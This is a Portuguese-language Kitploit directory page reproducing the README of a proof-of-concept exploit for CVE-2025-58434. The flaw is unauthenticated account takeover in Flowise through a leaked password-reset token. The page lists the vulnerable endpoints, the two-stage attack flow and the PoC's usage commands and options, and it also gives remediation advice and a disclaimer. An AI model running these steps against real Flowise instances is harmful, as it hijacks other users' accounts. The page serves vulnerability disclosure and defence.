Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-58434-poc — Prova de conceito de exploração para CVE-2025-58434, demonstrando tomada de conta não autenticada no Flowise através de tokens de redefinição de senha vazados. Inclui ataque em dois estágios: vazamento de token e redefinição de senha. | Kitploit
Ferramentas/GitHubGitHub/kartik2005221/cve-2025-58434-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e EducaçãoRed Teaming
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

Prova de conceito de exploração para CVE-2025-58434, demonstrando tomada de conta não autenticada no Flowise através de tokens de redefinição de senha vazados. Inclui ataque em dois estágios: vazamento de token e redefinição de senha.

Ver Repositório
138há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-58434 — Apropriação de Conta no Flowise via Exposição de Token

CVE CVSS Python License Disclosure

⚠️ Este repositório é apenas para fins educacionais e pesquisa de segurança autorizada.
O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal.


Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Fluxo do Ataque
  • Versões Afetadas
  • Estrutura do Repositório
  • Requisitos
  • Instalação
  • Uso
  • Exemplo de Saída
  • Remediação
  • Cronograma de Divulgação
  • Referências
  • Aviso Legal

  • Visão Geral

    O endpoint forgot-password no Flowise (tanto na versão cloud quanto na auto-hospedada) retorna um token de redefinição de senha válido (tempToken) diretamente no corpo da resposta HTTP — sem qualquer verificação de e-mail ou autenticação.

    Isso significa que um atacante que conhece (ou consegue adivinhar) o endereço de e-mail de uma vítima pode:

    1. Chamar o endpoint forgot-password → receber o tempToken na resposta JSON
    2. Usar o tempToken para chamar reset-password → definir uma nova senha arbitrária
    3. Fazer login como a vítima → apropriação total da conta (ATO)

    Nenhum acesso prévio, nenhuma interação do usuário e nenhum acesso ao e-mail são necessários.


    Detalhes da Vulnerabilidade

    CampoValor
    CVE IDCVE-2025-58434
    CVSS Score9.8 (Crítico)
    CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    CWECWE-640: Weak Password Recovery Mechanism
    TipoBypass de Autenticação / Exposição Indireta a Objetos Inseguros
    Aplicativo AfetadoFlowise (cloud + auto-hospedado)
    Endpoint 1POST /api/v1/account/forgot-password
    Endpoint 2POST /api/v1/account/reset-password

    Causa Raiz

    O manipulador de forgot-password retorna todo o registro do usuário — incluindo o tempToken gerado — diretamente na resposta da API, em vez de apenas enviá-lo para o endereço de e-mail registrado.

    root@kitploit:~
    {
      "user": {
        "id": "<uuid>",
        "name": "Nome da Vítima",
        "email": "[email protected]",
        "credential": "<bcrypt-hash>",
        "tempToken": "<TOKEN_VAZADO_AQUI>",
        "tokenExpiry": "2025-08-19T13:00:33.834Z",
        "status": "active"
      }
    }
    

    Fluxo do Ataque

    root@kitploit:~
    Atacante                              API Flowise
       │                                       │
       │  POST /forgot-password {email}        │
       │──────────────────────────────────────►│
       │                                       │  (gera tempToken)
       │◄──────────────────────────────────────│
       │  201 { tempToken: "abc123..." }       │
       │                                       │
       │  POST /reset-password {email,         │
       │         tempToken, newPassword}       │
       │──────────────────────────────────────►│
       │                                       │
       │◄──────────────────────────────────────│
       │  200 OK  (senha alterada!)            │
       │                                       │
       ✓  Apropriação de Conta Completa
    

    Versões Afetadas

    • Flowise Cloud (cloud.flowiseai.com) — confirmadamente afetado
    • Todas as implementações auto-hospedadas do Flowise anteriores ao patch

    Consulte o repositório oficial do Flowise no GitHub para informações sobre a versão corrigida.


    Estrutura do Repositório

    root@kitploit:~
    CVE-2025-58434/
    ├── cve_2025_58434_poc.py   # Script PoC principal (ATO em dois estágios)
    ├── requirements.txt         # Dependências Python
    ├── README.md                # Este arquivo
    └── DISCLAIMER.md            # Aviso legal (leia antes de usar)
    

    Requisitos

    • Python 3.7 ou superior
    • Biblioteca requests

    Instalação

    root@kitploit:~
    # Clone o repositório
    git clone https://github.com/seuusuario/CVE-2025-58434
    cd CVE-2025-58434
    
    # Instale as dependências
    pip install -r requirements.txt
    

    Uso

    Tela de Ajuda

    root@kitploit:~
    python3 cve_2025_58434_poc.py --help
    

    Estágio 1 — Vazar o Token (Reconhecimento)

    Confirme se a instância é vulnerável e recupere o tempToken sem redefinir nenhuma senha.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.exemplo.com \
      --email [email protected]
    

    Estágio 2 — Apropriação Total da Conta

    Use o token vazado para redefinir a senha imediatamente.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.exemplo.com \
      --email [email protected] \
      --reset \
      --new-password "MinhaNovaSenha2025!"
    

    Despejar Resposta JSON Bruta

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.exemplo.com \
      --email [email protected] \
      --json-output
    

    Todas as Opções

    BandeiraCurtaDescriçãoPadrão
    --url URL-uURL base da instância Flowise(obrigatório)
    --email EMAIL-eEndereço de e-mail da conta alvo(obrigatório)
    --reset-rExecutar Estágio 2: redefinir senha com token vazadoFalse
    --new-password PASS-pNova senha a definir (usado com --reset)Changeme@2025!
    --timeout SEGUNDOS-tTempo limite da requisição HTTP10
    --json-output-jImprimir resposta JSON bruta no stdoutFalse

    Exemplo de Saída

    root@kitploit:~
      [Passo 1] Enviando requisição forgot-password …
      [*] Status HTTP : 201
    
      ========================================================================
        DADOS DA CONTA VAZADOS
      ========================================================================
        ID do Usuário : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
        Nome          : Admin User
        Email         : [email protected]
        Credencial    : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        Status        : active
        tempToken     : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
        tokenExpiry   : 2025-08-19T13:00:33.834Z
      ========================================================================
    
      [+] tempToken obtido  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
      [!] VULNERÁVEL: A instância vaza tokens de redefinição de senha sem autenticação!
    

    Remediação

    Se você é operador de uma instância Flowise, aplique as seguintes mitigações imediatamente:

    1. Nunca retorne tokens de redefinição nas respostas da API. Envie o token exclusivamente para o endereço de e-mail registrado.
    2. Retorne uma mensagem de sucesso genérica do endpoint forgot-password independentemente de o e-mail existir — isso também evita enumeração de contas.
    3. Imponha restrições ao token:
      • Uso único (invalide após o primeiro uso)
      • Expiração curta (ex.: 15 minutos)
      • Vinculado ao IP / User-Agent da requisição, quando possível
    4. Aplique a correção em todos os modelos de implantação — cloud e auto-hospedado.
    5. Adicione limitação de taxa ao endpoint forgot-password.
    6. Registre e alerte sobre atividades anormais de redefinição de senha.
    7. Considere MFA para contas de administrador e alto privilégio.

    Cronograma de Divulgação

    DataEvento
    2025-08-19Vulnerabilidade descoberta e reportada
    A definirReconhecimento pelo fornecedor
    A definirPatch liberado
    A definirDivulgação pública

    Referências

    • GitHub Advisory GHSA-wgpv-6j63-x5ph
    • NVD — CVE-2025-58434
    • Repositório do Flowise no GitHub
    • CWE-640: Weak Password Recovery Mechanism

    Aviso Legal

    Este projeto destina-se exclusivamente a fins educacionais e testes de penetração autorizados.

    • NÃO execute esta ferramenta contra qualquer sistema sem permissão explícita por escrito do proprietário do sistema.
    • O(s) autor(es) deste repositório não assumem nenhuma responsabilidade por qualquer uso indevido, dano ou consequência legal decorrente do uso não autorizado.
    • Consulte DISCLAIMER.md para o aviso legal completo.
    Baixar ferramenta